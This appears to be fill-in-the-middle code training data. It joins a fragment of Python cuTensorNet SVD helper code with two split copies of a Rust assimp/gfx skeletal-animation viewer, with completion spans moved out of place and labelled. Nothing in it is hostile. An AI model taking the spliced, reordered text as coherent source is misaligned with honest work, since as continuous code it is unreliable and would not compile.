getter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
return data
def set_svd_config_scalar_attr(handle, obj, attr, data, svd_algorithm=None):
"""
Set the data for given attribute of SVDConfig.
"""
setter = cutn.tensor_svd_config_set_attribute
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
raise ValueError(f"Algorithm specific parameters not supported for {svd_algorithm}")
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
if not isinstance(data, numpy.ndarray):
data = numpy.asarray(data, dtype=dtype)
setter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
def parse_svd_config(handle, svd_config, svd_method, logger=None):
"""
Given an SVDMethod object, set the corresponding attributes in the SVDConfig.
"""
svd_algorithm = None
for method_attr, attr in SVD_METHOD_CONFIG_MAP.items():
data = getattr(svd_method, method_attr)
if method_attr == 'partition':
data = PARTITION_MAP[data]
elif method_attr == 'normalization':
data = NORMALIZATION_MAP[data]
elif method_attr == 'algorithm':
svd_algorithm = data = SVD_ALGORITHM_MAP[data]
set_svd_config_scalar_attr(handle, svd_config, attr, data)
if logger is not None:
logger.info(f"The SVDConfig attribute '{method_attr}' has been set to {data}.")
algo_params = svd_method._get_algo_params()
if algo_params is not None:
set_svd_config_scalar_attr(handle, svd_config, cutn.TensorSVDConfigAttribute.ALGO_PARAMS, algo_params, svd_algorithm=svd_algorithm)
if logger is not None:
logger.info(f"The SVDConfig attribute '{cutn.TensorSVDConfigAttribute.ALGO_PARAMS}' has been set to {algo_params}.")
def get_svd_info_dict(handle, svd_info):
"""
Parse the information in SVDInfo in a dictionary object.
"""
info = dict()
for key, attr in SVD_INFO_MAP.items():
info[key] = get_svd_config_info_scalar_attr(handle, 'info', svd_info, attr).item()
svd_algorithm = info['algorithm']
algo_status = get_svd_config_info_scalar_attr(handle, 'info', svd_info, cutn.TensorSVDInfoAttribute.ALGO_STATUS, svd_algorithm=svd_algorithm)
info['algorithm'] = SVD_ALGORITHM_MAP_TO_STRING[svd_algorithm]
if algo_status is not None:
for name in algo_status.dtype.names:
key = info['algorithm'] + f'_{name}'
info[key] = algo_status[name].item()
return info
def parse_decompose_operands_options(options, wrapped_operands, allowed_dtype_names=None):
"""
Given initially wrapped tensors and network options, wrap the operands to device and create an internal NetworkOptions object.
If cutensornet library handle is not provided in `options`, one will be created in the internal options.
"""
device_id = utils.get_network_device_id(wrapped_operands)
logger = logging.getLogger() if options.logger is None else options.logger
operands_location = 'cuda'
if device_id is None:
operands_location = 'cpu'
device_id = options.device_id
logger.info(f"Begin transferring input data from host to device {device_id}")
wrapped_operands = tensor_wrapper.to(wrapped_operands, device_id)
logger.info("Input data transfer finished")
# initialize handle once if not provided
if options.handle is not None:
own_handle = False
handle = options.handle
else:
own_handle = True
with utils.device_ctx(device_id):
handle = cutn.create()
dtype_name = utils.get_operands_dtype(wrapped_operands)
if allowed_dtype_names is not None and dtype_name not in allowed_dtype_names:
raise ValueError(f"dtype {dtype_name} not supported")
compute_type = options.compute_type if options.compute_type is not None else typemaps.NAME_TO_COMPUTE_TYPE[dtype_name]
package = utils.get_operands_package(wrapped_operands)
allocator = options.allocator if options.allocator is not None else memory._MEMORY_MANAGER[package](device_id, logger)
internal_options = options.__class__(device_id=device_id,
logger=logger,
handle=handle,
blocking=options.blocking,
compute_type=compute_type,
memory_limit=options.memory_limit,
allocator=allocator)
return wrapped_operands, internal_options, own_handle, operands_location
def allocate_and_set_workspace(handle, allocator, workspace_desc, pref, mem_space, workspace_kind, device_id, stream, stream_ctx, logger, task_name=''):
"""
Allocate and set the workspace in the workspace descriptor.
"""
workspace_size = cutn.workspace_get_memory_size(handle, workspace_desc, pref, mem_space, workspace_kind)
# Allocate and set workspace
if mem_space == cutn.Memspace.DEVICE:
with utils.device_ctx(device_id), stream_ctx:
try:
logger.debug(f"Allocating device memory for {task_name}")
workspace_ptr = allocator.memalloc(workspace_size)
except TypeError as e:
message = "The method 'memalloc' in the allocator object must conform to the interface in the "\
"'BaseCUDAMemoryManager' protocol."
raise TypeError(message) from e
logger.debug(f"Finished allocating device memory of size {formatters.MemoryStr(workspace_size)} for decomposition in the context of stream {stream}.")
device_ptr = utils.get_ptr_from_memory_pointer(workspace_ptr)
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, device_ptr, workspace_size)
logger.debug(f"The workspace memory (device pointer = {device_ptr}) has been set in the workspace descriptor.")
return workspace_ptr
elif workspace_size != 0:
# host workspace
logger.debug(f"Allocating host memory for {task_name}")
workspace_host = numpy.empty(workspace_size, dtype=numpy.int8)
logger.debug(f"Finished allocating host memory of size {formatters.MemoryStr(workspace_size)} for decomposition.")
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, workspace_host.ctypes.data, workspace_size)
logger.debug(f"The workspace memory (host pointer = {workspace_host.ctypes.data}) has been set in the workspace descriptor.")
return workspace_host
else:
return None
def _destroy_tensor_descriptors(desc_tensors):
for t in desc_tensors:
if t is not None:
cutn.destroy_tensor_descriptor(t)
def create_operands_and_descriptors(handle, wrapped_operands, size_dict, inputs, outputs, mid_extent, method, device_id, stream_ctx, logger):
"""
Create empty tensor operands and corresponding tensor descriptors for a decomposition problem.
"""
# Create input tensor descriptors, output operands and output tensor descriptors
output_class = wrapped_operands[0].__class__
dtype_name = wrapped_operands[0].dtype
# Compute extents for the outputs
shared_mode_out = list(set(outputs[0]) & set(outputs[1]))[0]
output_extents = [tuple(size_dict[m] if m != shared_mode_out else mid_extent for m in modes) for modes in outputs]
logger.debug("Creating input tensor descriptors.")
input_tensor_descriptors = []
output_tensor_descriptors = []
try:
for (t, modes) in zip(wrapped_operands, inputs):
input_tensor_descriptors.append(t.create_tensor_descriptor(handle, modes))
logger.debug("The input tensor descriptors have been created.")
# Create the output in the context of the current stream to work around a performance issue with CuPy's memory pool.
logger.debug("Beginning output tensors and descriptors creation...")
s = None
s_ptr = 0
output_operands = []
with utils.device_ctx(device_id):
for extent, tensor_modes in zip(output_extents, outputs):
operand = utils.create_empty_tensor(output_class, extent, dtype_name, device_id, stream_ctx)
output_operands.append(operand)
output_tensor_descriptors.append(operand.create_tensor_descriptor(handle, tensor_modes))
if hasattr(method, 'partition') and method.partition is None:
if dtype_name in ['float32', 'complex64']:
s_dtype_name = 'float32'
elif dtype_name in ['float64', 'complex128']:
s_dtype_name = 'float64'
else:
raise ValueError(f"{dtype_name} data type not supported")
s = utils.create_empty_tensor(output_class, (mid_extent, ), s_dtype_name, device_id, stream_ctx)
s_ptr = s.data_ptr
logger.debug("The output tensors and descriptors have been created.")
except:
_destroy_tensor_descriptors(input_tensor_descriptors)
_destroy_tensor_descriptors(output_tensor_descriptors)
raise
return input_tensor_descriptors, output_operands, output_tensor_descriptors, s, s_ptr
def get_return_operand_data(tensor, target_location):
"""
Given wrapped tensors, fetch the return operands based on target location.
"""
if tensor is None: # potentially for s
return tensor
if target_location == 'cpu':
return tensor.to('cpu')
else: # already on device
return tensor.tensor
| raise ValueError(f"Ellipsis for all operands must refer to equal number of modes, found {num_implicit_modes}") | conditional_block |
main.rs | #![feature(phase)]
#![feature(globs)]
#[phase(plugin)]
extern crate gfx_macros;
extern crate current;
extern crate shader_version;
extern crate vecmath;
extern crate event;
extern crate input;
extern crate cam;
extern crate gfx;
extern crate device;
extern crate sdl2;
extern crate sdl2_window;
extern crate time;
extern crate image;
extern crate assimp;
use std::cell::RefCell;
use std::collections::HashMap;
use std::io;
use std::num::Float;
use assimp as ai;
use current::{ Set };
use image::GenericImage;
use sdl2_window::Sdl2Window;
use gfx::{ Device, DeviceHelper};
use event::{ Events, WindowSettings };
use event::window::{ CaptureCursor };
const MAX_BONES: uint = 60;
type Vec3 = [f32, ..3];
type Vec4 = [f32, ..4];
type IVec4 = [u32, ..4];
type Mat4 = [Vec4, ..4];
struct TextureStore {
textures: HashMap<String, gfx::TextureHandle>,
}
impl TextureStore {
fn new(directory: &str,
device: &mut gfx::GlDevice,
) -> TextureStore {
let mut textures = HashMap::new();
let dir = Path::new(directory);
let stuff = io::fs::readdir(&dir).unwrap();
for path in stuff.iter() {
match path.extension_str() {
None => continue,
Some(ext) => if ext != "tga" {
continue;
},
}
let mut img = image::open(path).unwrap();
let (w, h) = img.dimensions();
img = image::DynamicImage::ImageRgba8(img.to_rgba());
assert!(img.color() == image::RGBA(8));
let tinfo = gfx::tex::TextureInfo {
width: w as u16,
height: h as u16,
depth: 1,
levels: 1,
kind: gfx::tex::Texture2D,
format: gfx::tex::RGBA8,
};
let img_info = tinfo.to_image_info();
let texture = device.create_texture(tinfo).unwrap();
device.update_texture(
&texture,
&img_info,
img.raw_pixels().as_slice(),
).unwrap();
match path.filename_str() {
Some(fname) => {
textures.insert(fname.into_string(), texture);
println!("Loaded texture: {}", fname);
},
None => panic!("Couldn't create texture from image"),
}
}
TextureStore {
textures: textures
}
}
}
struct BoneMap {
/// Translates a bone name into a bone id
pub bone_map: HashMap<String, u32>,
pub offsets: Vec<ai::Matrix4x4>,
pub transforms: Vec<Mat4>,
}
impl BoneMap {
fn new(scene: &ai::Scene) -> BoneMap {
let mut bone_map = HashMap::new();
let mut offsets = Vec::new();
let mut num_bones = 0u32;
for mesh in scene.get_meshes().iter() {
for bone in mesh.get_bones().iter() {
let name = bone.name.to_string();
match bone_map.get(&name) {
Some(_) => continue,
None => {
bone_map.insert(name, num_bones);
offsets.push(bone.offset_matrix);
num_bones += 1;
}
}
}
}
BoneMap {
bone_map: bone_map,
offsets: offsets,
transforms: Vec::from_elem(MAX_BONES, vecmath::mat4_id()),
}
}
#[inline(always)]
fn get_id(&self, name: &String) -> Option<u32> {
match self.bone_map.get(name) {
None => None,
Some(val) => Some(*val),
}
}
}
struct ModelComponent {
pub batch: ModelBatch,
pub shader_data: ShaderParam,
}
struct Model<'a> {
pub vertices: Vec<Vertex>,
pub indices: Vec<u32>,
pub batches: Vec<ModelComponent>,
pub scene: ai::Scene<'a>,
pub bone_map: RefCell<BoneMap>,
pub global_inverse: ai::Matrix4x4,
pub bone_transform_buffer: gfx::BufferHandle<Mat4>,
}
#[inline(always)]
fn lerp<S, T: Add<T,T> + Sub<T,T> + Mul<S,T>>(start: T, end: T, s: S) -> T {
return start + (end - start) * s;
}
impl<'a> Model<'a> {
fn from_file(ai_scene: ai::Scene<'a>,
graphics: &mut gfx::Graphics<gfx::GlDevice, gfx::GlCommandBuffer>,
program: &gfx::ProgramHandle,
state: &gfx::DrawState,
texture_store: &TextureStore,
) -> Model<'a> {
// calculate the space we need to allocate
let mut num_vertices = 0;
let mut num_indices = 0;
for mesh in ai_scene.get_meshes().iter() {
num_vertices += mesh.num_vertices;
num_indices += mesh.num_faces * 3;
}
// prepare the data structures used to store the scene
let mut vertices = Vec::with_capacity(num_vertices as uint);
let mut indices = Vec::with_capacity(num_indices as uint);
// The bone weights and ids. Each vertex may be influenced by upto
// 4 bones
let mut bone_weights: Vec<Vec4> = Vec::from_elem(num_vertices as uint,
[0.0, ..4]);
let mut bone_ids: Vec<IVec4> = Vec::from_elem(num_vertices as uint,
[0, ..4]);
let bone_map = BoneMap::new(&ai_scene);
// stores the first index of each mesh, used for creating batches
let mut start_indices = Vec::with_capacity(ai_scene.num_meshes as uint + 1);
let mut materials = Vec::with_capacity(ai_scene.num_materials as uint);
let mut batches = Vec::with_capacity(ai_scene.num_meshes as uint);
| // find the textures used by this model from the list of materials
for mat in ai_scene.get_materials().iter() {
let texture_src = mat.get_texture(ai::material::TextureType::Diffuse,
0
);
match texture_src {
Some(s) => {
match texture_store.textures.get(&s) {
Some(t) => materials.push(t),
None => panic!("couldn't load texture: {}", s),
}
}
None => {
panic!("could read texture name from material: {}", texture_src);
}
}
}
// prepare the data for a format that can be loaded to the gpu
{
start_indices.push(0);
for mesh in ai_scene.get_meshes().iter() {
let vert_id_offset = vertices.len() as u32;
// get all the bone information for this mesh
for bone in mesh.get_bones().iter() {
let bone_id = bone_map.get_id(&bone.name.to_string());
// println!("{}: Bone id and name: {} ===> {}",
// mesh_num, bone_id, bone.name);
let bone_id = match bone_id {
None => panic!("Invaild bone reference"),
Some(id) => id,
};
'next_weight: for vert_weight in bone.get_weights().iter() {
let vertex_id = (vert_id_offset + vert_weight.vertex_id) as uint;
for i in range(0u, 4) {
if bone_ids[vertex_id][i] == 0 {
bone_weights[vertex_id][i] = vert_weight.weight;
bone_ids[vertex_id][i] = bone_id;
continue 'next_weight;
}
}
// assimp should have limited bone weights to 4
unreachable!();
}
}
let verts = mesh.get_vertices();
let norms = mesh.get_normals();
let tex_coords = mesh.get_texture_coords();
// fill up the vertex buffer
for i in range(0u, verts.len()) {
vertices.push( Vertex {
a_position: verts[i].to_array(),
a_normal: norms[i].to_array(),
a_tex_coord: if tex_coords.len() == 0 {
[0.0, 0.0, 0.0]
} else {
// only support 1 texture coord
tex_coords[0][i].to_array()
},
a_bone_weights: bone_weights[i + vert_id_offset as uint],
a_bone_ids: bone_ids[i + vert_id_offset as uint],
});
}
// fill up the index buffer
for face in mesh.get_faces().iter() {
let face_indices = face.get_indices();
assert!(face_indices.len() == 3);
indices.push(face_indices[0] + vert_id_offset);
indices.push(face_indices[1] + vert_id_offset);
indices.push(face_indices[2] + vert_id_offset);
}
start_indices.push(indices.len() as u32);
}
}
// create the vertex and index buffers
// generate the batches used to draw the object
{
let vert_buf = graphics.device.create_mesh(vertices.as_slice());
let ind_buf = graphics.device.create_buffer_static(indices.as_slice());
let mut buf_slices = Vec::with_capacity(ai_scene.num_meshes as uint + 1);
for ind in start_indices.windows(2) {
buf_slices.push(gfx::Slice {
start: ind[0],
end: ind[1],
prim_type: gfx::TriangleList,
// prim_type: gfx::LineStrip,
kind: gfx::SliceKind::Index32(ind_buf, 0 as u32),
});
}
for (slice, mesh) in buf_slices.iter()
.zip(ai_scene.get_meshes().iter()) {
let shader_data = ShaderParam {
u_model_view_proj: vecmath::mat4_id(),
t_color: (*materials[mesh.material_index as uint], None),
u_bone_transformations: u_bone_transformations.raw(),
};
batches.push(ModelComponent {
batch: graphics.make_batch(program,
&vert_buf,
*slice,
state).unwrap(),
shader_data: shader_data,
});
}
}
Model {
vertices: vertices,
indices: indices,
batches: batches,
bone_map: RefCell::new(bone_map),
bone_transform_buffer: u_bone_transformations,
global_inverse: ai_scene.get_root_node().transformation.inverse(),
scene: ai_scene,
}
}
fn interpolate_position(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Vector3D {
let keys = node.get_position_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for pos_keys in keys.windows(2) {
// note: once we find a match, we return
if time < pos_keys[1].time {
let dt = pos_keys[1].time - pos_keys[0].time;
// how far inbetween the frams we are on a scale from 0 to 1
let s = (time - pos_keys[0].time) / dt;
return lerp(pos_keys[0].value,
pos_keys[1].value,
s as f32);
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn interpolate_scaling(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Vector3D {
let keys = node.get_scaling_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for scale_keys in keys.windows(2) {
// note: once we find a match, we return
if time < scale_keys[1].time {
let dt = scale_keys[1].time - scale_keys[0].time;
// how far inbetween the frams we are on a scale from 0 to 1
let s = (time - scale_keys[0].time) / dt;
return lerp(scale_keys[0].value,
scale_keys[1].value,
s as f32);
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn interpolate_rotation(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Quaternion {
let keys = node.get_rotation_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for rot_keys in keys.windows(2) {
// note: once we find a match, we return
if time < rot_keys[1].time {
let dt = rot_keys[1].time - rot_keys[0].time;
// how far inbetween the frames we are on a scale from 0 to 1
let s = (time - rot_keys[0].time) / dt;
// nlerp
return lerp(rot_keys[0].value,
rot_keys[1].value,
s as f32).normalize();
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn update_bone_transforms(&self,
time: f64,
anim_num: uint,
scene_node: &ai::scene::Node,
parent_transform: &ai::Matrix4x4,
) {
// calculate the transformation matrix for this node
let animation = self.scene.get_animations()[anim_num];
let node_transform = match animation.find_node_anim(&scene_node.name) {
Some(node_anim) => {
self.interpolate_position(time, node_anim).translation_matrix() *
self.interpolate_rotation(time, node_anim).rotation_matrix() *
self.interpolate_scaling(time, node_anim).scaling_matrix()
},
None => {
scene_node.transformation
}
};
let node_to_global = *parent_transform * node_transform;
let opt_id = {
self.bone_map.borrow().get_id(&scene_node.name.to_string())
};
match opt_id {
None => { },
Some(id) => {
let offset = {
self.bone_map.borrow().offsets[id as uint]
};
{
self.bone_map.borrow_mut().transforms[id as uint] =
(self.global_inverse * node_to_global * offset)
.transpose().to_array();
}
}
}
for child in scene_node.get_children().iter() {
self.update_bone_transforms(time,
anim_num,
*child,
&node_to_global,
);
}
}
fn draw(&mut self,
graphics: &mut gfx::Graphics<gfx::GlDevice, gfx::GlCommandBuffer>,
frame: &gfx::Frame,
time: f64,
transform: Mat4,
) {
self.update_bone_transforms(time,
0,
self.scene.get_root_node(),
&ai::Matrix4x4::identity(),
);
graphics.device.update_buffer(self.bone_transform_buffer,
self.bone_map.borrow().transforms.as_slice(),
0,
);
for &mut component in self.batches.iter() {
component.shader_data.u_model_view_proj = transform;
graphics.draw(&component.batch, &component.shader_data, frame);
}
}
}
#[deriving(Show)]
#[vertex_format]
struct Vertex {
#[as_float]
a_position: [f32, ..3],
#[as_float]
a_normal: [f32, ..3],
#[as_float]
a_tex_coord: [f32, ..3],
#[as_float]
a_bone_weights: [f32, ..4],
a_bone_ids: [u32, ..4],
}
#[shader_param(ModelBatch)]
struct ShaderParam {
u_model_view_proj: Mat4,
/// texture for the mesh
t_color: gfx::shade::TextureParam,
/// mesh transformations caused by bones
u_bone_transformations: gfx::RawBufferHandle,
}
static VERTEX_SRC: gfx::ShaderSource<'static> = shaders! {
GLSL_150: b"
#version 150 core
in vec3 a_position;
in vec3 a_normal;
in vec3 a_tex_coord;
in vec4 a_bone_weights;
in ivec4 a_bone_ids;
out vec2 v_TexCoord;
const int MAX_BONES = 60;
uniform mat4 u_model_view_proj;
uniform u_bone_transformations {
mat4[MAX_BONES] bones;
} u_bones;
void main() {
mat4 bone_trans = u_bones.bones[a_bone_ids[0]] * a_bone_weights[0];
bone_trans += u_bones.bones[a_bone_ids[1]] * a_bone_weights[1];
bone_trans += u_bones.bones[a_bone_ids[2]] * a_bone_weights[2];
bone_trans += u_bones.bones[a_bone_ids[3]] * a_bone_weights[3];
gl_Position = u_model_view_proj * bone_trans * vec4(a_position, 1.0);
v_TexCoord = vec2(a_tex_coord);
}
"
};
static FRAGMENT_SRC: gfx::ShaderSource<'static> = shaders! {
GLSL_150: b"
#version 150 core
in vec2 v_TexCoord;
out vec4 o_Color;
uniform sampler2D t_color;
void main() {
vec4 tex = texture(t_color, v_TexCoord);
float blend = dot(v_TexCoord-vec2(0.5,0.5), v_TexCoord-vec2(0.5,0.5));
o_Color = mix(tex, vec4(0.0,0.0,0.0,0.0), blend*1.0);
}
"
};
#[start]
fn start(argc: int, argv: *const *const u8) -> int {
std::rt::start(argc, argv, main)
}
fn main() {
let (win_width, win_height) = (640, 480);
let mut window = Sdl2Window::new(
shader_version::opengl::OpenGL_3_2,
WindowSettings {
title: "model".to_string(),
size: [win_width, win_height],
fullscreen: false,
exit_on_esc: true,
samples: 4,
}
);
window.set_mut(CaptureCursor(true));
let mut device = gfx::GlDevice::new(|s| unsafe {
std::mem::transmute(sdl2::video::gl_get_proc_address(s))
});
let frame = gfx::Frame::new(win_width as u16, win_height as u16);
let state = gfx::DrawState::new().depth(gfx::state::LessEqual, true);
ai::log::add_log_stream(ai::log::Stdout);
let _ = device.create_sampler(
gfx::tex::SamplerInfo::new(
gfx::tex::Bilinear,
gfx::tex::Clamp
)
);
let program = device.link_program(
VERTEX_SRC.clone(),
FRAGMENT_SRC.clone()
).unwrap();
let texture_store = TextureStore::new("../assets/guard-md5",
&mut device
);
let mut graphics = gfx::Graphics::new(device);
let mut importer = ai::Importer::new();
// limit bone weights to 4 per vertex
importer.set_import_property(ai::Property::PP_LBW_MAX_WEIGHTS(4));
importer.add_processing_steps(&[
ai::Process::Triangulate,
ai::Process::GenSmoothNormals,
ai::Process::JoinIdenticalVertices,
ai::Process::LimitBoneWeights,
]);
let fname = "../assets/guard-md5/guard.md5mesh";
let ai_scene = match importer.import_from_file(fname) {
Some(scene) => scene,
None => panic!("failed to import scene: {}", fname),
};
let mut model = Model::from_file(ai_scene,
&mut graphics,
&program,
&state,
&texture_store,
);
// Rotate the model 90 deg around the x-axis
let model_view = [
[1.0, 0.0, 0.0, 0.0],
[0.0, 0.0, -1.0, 0.0],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0],
];
let projection = cam::CameraPerspective {
fov: 90.0f32,
near_clip: 0.1,
far_clip: 1000.0,
aspect_ratio: (win_width as f32) / (win_height as f32)
}.projection();
let mut first_person = cam::FirstPerson::new(
[0.0, 33.0, 48.0],
cam::FirstPersonSettings::keyboard_wasd()
);
first_person.velocity = 30.0f32;
first_person.settings.speed_vertical = 30.0f32;
let start = time::get_time();
let window = RefCell::new(window);
for e in Events::new(&window) {
use event::RenderEvent;
let now = time::get_time() - start;
let time = 18.0 * now.num_milliseconds() as f64 / 1e3;
let fmod = |x: f64, y: f64| -> f64 {
x - (x/y).floor() * y
};
let time = fmod(time , 140.0);
first_person.event(&e);
e.render(|args| {
graphics.clear(
gfx::ClearData {
color: [0.3, 0.3, 0.3, 1.0],
depth: 1.0,
stencil: 0,
},
gfx::COLOR | gfx::DEPTH,
&frame
);
let u_model_view_proj =
cam::model_view_projection(
model_view,
first_person.camera(args.ext_dt).orthogonal(),
projection
);
model.draw(&mut graphics,
&frame,
time,
u_model_view_proj,
);
graphics.end_frame();
});
}
} | // Create the buffer for the bone transformations. We fill this
// up each time we draw, so no need to do it here.
let u_bone_transformations: gfx::BufferHandle<Mat4> =
graphics.device.create_buffer(MAX_BONES, gfx::BufferUsage::Dynamic);
| random_line_split |
main.rs | #![feature(phase)]
#![feature(globs)]
#[phase(plugin)]
extern crate gfx_macros;
extern crate current;
extern crate shader_version;
extern crate vecmath;
extern crate event;
extern crate input;
extern crate cam;
extern crate gfx;
extern crate device;
extern crate sdl2;
extern crate sdl2_window;
extern crate time;
extern crate image;
extern crate assimp;
use std::cell::RefCell;
use std::collections::HashMap;
use std::io;
use std::num::Float;
use assimp as ai;
use current::{ Set };
use image::GenericImage;
use sdl2_window::Sdl2Window;
use gfx::{ Device, DeviceHelper};
use event::{ Events, WindowSettings };
use event::window::{ CaptureCursor };
const MAX_BONES: uint = 60;
type Vec3 = [f32, ..3];
type Vec4 = [f32, ..4];
type IVec4 = [u32, ..4];
type Mat4 = [Vec4, ..4];
struct TextureStore {
textures: HashMap<String, gfx::TextureHandle>,
}
impl TextureStore {
fn new(directory: &str,
device: &mut gfx::GlDevice,
) -> TextureStore {
let mut textures = HashMap::new();
let dir = Path::new(directory);
let stuff = io::fs::readdir(&dir).unwrap();
for path in stuff.iter() {
match path.extension_str() {
None => continue,
Some(ext) => if ext != "tga" {
continue;
},
}
let mut img = image::open(path).unwrap();
let (w, h) = img.dimensions();
img = image::DynamicImage::ImageRgba8(img.to_rgba());
assert!(img.color() == image::RGBA(8));
let tinfo = gfx::tex::TextureInfo {
width: w as u16,
height: h as u16,
depth: 1,
levels: 1,
kind: gfx::tex::Texture2D,
format: gfx::tex::RGBA8,
};
let img_info = tinfo.to_image_info();
let texture = device.create_texture(tinfo).unwrap();
device.update_texture(
&texture,
&img_info,
img.raw_pixels().as_slice(),
).unwrap();
match path.filename_str() {
Some(fname) => {
textures.insert(fname.into_string(), texture);
println!("Loaded texture: {}", fname);
},
None => panic!("Couldn't create texture from image"),
}
}
TextureStore {
textures: textures
}
}
}
struct BoneMap {
/// Translates a bone name into a bone id
pub bone_map: HashMap<String, u32>,
pub offsets: Vec<ai::Matrix4x4>,
pub transforms: Vec<Mat4>,
}
impl BoneMap {
fn new(scene: &ai::Scene) -> BoneMap {
let mut bone_map = HashMap::new();
let mut offsets = Vec::new();
let mut num_bones = 0u32;
for mesh in scene.get_meshes().iter() {
for bone in mesh.get_bones().iter() {
let name = bone.name.to_string();
match bone_map.get(&name) {
Some(_) => continue,
None => {
bone_map.insert(name, num_bones);
offsets.push(bone.offset_matrix);
num_bones += 1;
}
}
}
}
BoneMap {
bone_map: bone_map,
offsets: offsets,
transforms: Vec::from_elem(MAX_BONES, vecmath::mat4_id()),
}
}
#[inline(always)]
fn get_id(&self, name: &String) -> Option<u32> {
match self.bone_map.get(name) {
None => None,
Some(val) => Some(*val),
}
}
}
struct ModelComponent {
pub batch: ModelBatch,
pub shader_data: ShaderParam,
}
struct | <'a> {
pub vertices: Vec<Vertex>,
pub indices: Vec<u32>,
pub batches: Vec<ModelComponent>,
pub scene: ai::Scene<'a>,
pub bone_map: RefCell<BoneMap>,
pub global_inverse: ai::Matrix4x4,
pub bone_transform_buffer: gfx::BufferHandle<Mat4>,
}
#[inline(always)]
fn lerp<S, T: Add<T,T> + Sub<T,T> + Mul<S,T>>(start: T, end: T, s: S) -> T {
return start + (end - start) * s;
}
impl<'a> Model<'a> {
fn from_file(ai_scene: ai::Scene<'a>,
graphics: &mut gfx::Graphics<gfx::GlDevice, gfx::GlCommandBuffer>,
program: &gfx::ProgramHandle,
state: &gfx::DrawState,
texture_store: &TextureStore,
) -> Model<'a> {
// calculate the space we need to allocate
let mut num_vertices = 0;
let mut num_indices = 0;
for mesh in ai_scene.get_meshes().iter() {
num_vertices += mesh.num_vertices;
num_indices += mesh.num_faces * 3;
}
// prepare the data structures used to store the scene
let mut vertices = Vec::with_capacity(num_vertices as uint);
let mut indices = Vec::with_capacity(num_indices as uint);
// The bone weights and ids. Each vertex may be influenced by upto
// 4 bones
let mut bone_weights: Vec<Vec4> = Vec::from_elem(num_vertices as uint,
[0.0, ..4]);
let mut bone_ids: Vec<IVec4> = Vec::from_elem(num_vertices as uint,
[0, ..4]);
let bone_map = BoneMap::new(&ai_scene);
// stores the first index of each mesh, used for creating batches
let mut start_indices = Vec::with_capacity(ai_scene.num_meshes as uint + 1);
let mut materials = Vec::with_capacity(ai_scene.num_materials as uint);
let mut batches = Vec::with_capacity(ai_scene.num_meshes as uint);
// Create the buffer for the bone transformations. We fill this
// up each time we draw, so no need to do it here.
let u_bone_transformations: gfx::BufferHandle<Mat4> =
graphics.device.create_buffer(MAX_BONES, gfx::BufferUsage::Dynamic);
// find the textures used by this model from the list of materials
for mat in ai_scene.get_materials().iter() {
let texture_src = mat.get_texture(ai::material::TextureType::Diffuse,
0
);
match texture_src {
Some(s) => {
match texture_store.textures.get(&s) {
Some(t) => materials.push(t),
None => panic!("couldn't load texture: {}", s),
}
}
None => {
panic!("could read texture name from material: {}", texture_src);
}
}
}
// prepare the data for a format that can be loaded to the gpu
{
start_indices.push(0);
for mesh in ai_scene.get_meshes().iter() {
let vert_id_offset = vertices.len() as u32;
// get all the bone information for this mesh
for bone in mesh.get_bones().iter() {
let bone_id = bone_map.get_id(&bone.name.to_string());
// println!("{}: Bone id and name: {} ===> {}",
// mesh_num, bone_id, bone.name);
let bone_id = match bone_id {
None => panic!("Invaild bone reference"),
Some(id) => id,
};
'next_weight: for vert_weight in bone.get_weights().iter() {
let vertex_id = (vert_id_offset + vert_weight.vertex_id) as uint;
for i in range(0u, 4) {
if bone_ids[vertex_id][i] == 0 {
bone_weights[vertex_id][i] = vert_weight.weight;
bone_ids[vertex_id][i] = bone_id;
continue 'next_weight;
}
}
// assimp should have limited bone weights to 4
unreachable!();
}
}
let verts = mesh.get_vertices();
let norms = mesh.get_normals();
let tex_coords = mesh.get_texture_coords();
// fill up the vertex buffer
for i in range(0u, verts.len()) {
vertices.push( Vertex {
a_position: verts[i].to_array(),
a_normal: norms[i].to_array(),
a_tex_coord: if tex_coords.len() == 0 {
[0.0, 0.0, 0.0]
} else {
// only support 1 texture coord
tex_coords[0][i].to_array()
},
a_bone_weights: bone_weights[i + vert_id_offset as uint],
a_bone_ids: bone_ids[i + vert_id_offset as uint],
});
}
// fill up the index buffer
for face in mesh.get_faces().iter() {
let face_indices = face.get_indices();
assert!(face_indices.len() == 3);
indices.push(face_indices[0] + vert_id_offset);
indices.push(face_indices[1] + vert_id_offset);
indices.push(face_indices[2] + vert_id_offset);
}
start_indices.push(indices.len() as u32);
}
}
// create the vertex and index buffers
// generate the batches used to draw the object
{
let vert_buf = graphics.device.create_mesh(vertices.as_slice());
let ind_buf = graphics.device.create_buffer_static(indices.as_slice());
let mut buf_slices = Vec::with_capacity(ai_scene.num_meshes as uint + 1);
for ind in start_indices.windows(2) {
buf_slices.push(gfx::Slice {
start: ind[0],
end: ind[1],
prim_type: gfx::TriangleList,
// prim_type: gfx::LineStrip,
kind: gfx::SliceKind::Index32(ind_buf, 0 as u32),
});
}
for (slice, mesh) in buf_slices.iter()
.zip(ai_scene.get_meshes().iter()) {
let shader_data = ShaderParam {
u_model_view_proj: vecmath::mat4_id(),
t_color: (*materials[mesh.material_index as uint], None),
u_bone_transformations: u_bone_transformations.raw(),
};
batches.push(ModelComponent {
batch: graphics.make_batch(program,
&vert_buf,
*slice,
state).unwrap(),
